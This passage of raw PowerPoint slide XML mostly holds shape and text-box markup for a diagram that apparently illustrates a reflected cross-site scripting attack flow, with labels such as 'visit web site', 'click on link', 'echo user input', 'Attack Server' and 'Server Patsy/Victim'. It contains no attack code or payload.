            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1080000">
            <a:off x="3131668" y="4324147"/>
            <a:ext cx="1325052" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>click </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-225" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>link</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1080000">
            <a:off x="2417361" y="4699080"/>
            <a:ext cx="1828745" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" b="1" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>echo </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-157" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2714739" y="3933939"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="174796" y="364896"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2714739" y="3933939"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="8639" y="126595"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356257" y="238300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1020000">
            <a:off x="2779163" y="3988389"/>
            <a:ext cx="291738" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1845129" y="4585019"/>
            <a:ext cx="3260725" cy="1130300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3260725" h="1130300">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3260270" y="1129980"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1777782" y="4550892"/>
            <a:ext cx="122520" cy="89301"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2028939" y="4235564"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="174796" y="364896"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2028939" y="4235564"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="8639" y="126595"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356257" y="238300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1020000">
            <a:off x="2093363" y="4290014"/>
            <a:ext cx="291738" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5483225" y="4739640"/>
            <a:ext cx="2199640" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Patsy/Victim</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5631877" y="2133600"/>
            <a:ext cx="2301433" cy="744601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="object 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6016625" y="1767840"/>
            <a:ext cx="1520825" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2046288" y="2169971"/>
            <a:ext cx="3115945" cy="667385"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3115945" h="667385">
                <a:moveTo>
                  <a:pt x="0" y="666891"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3115751" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5109603" y="2130986"/>
            <a:ext cx="121635" cy="91421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="object 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20940000">
            <a:off x="3039428" y="2019637"/>
            <a:ext cx="1478043" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>visit </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-232" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>site</a:t>
            </a:r>
            <a:endParaRPr sz="3000" baseline="2777">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="object 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2141833" y="2532063"/>
            <a:ext cx="3345179" cy="751840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3345179" h="751839">
                <a:moveTo>
                  <a:pt x="3344565" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="751639"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="object 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2072757" y="3231015"/>
            <a:ext cx="121762" cy="91280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
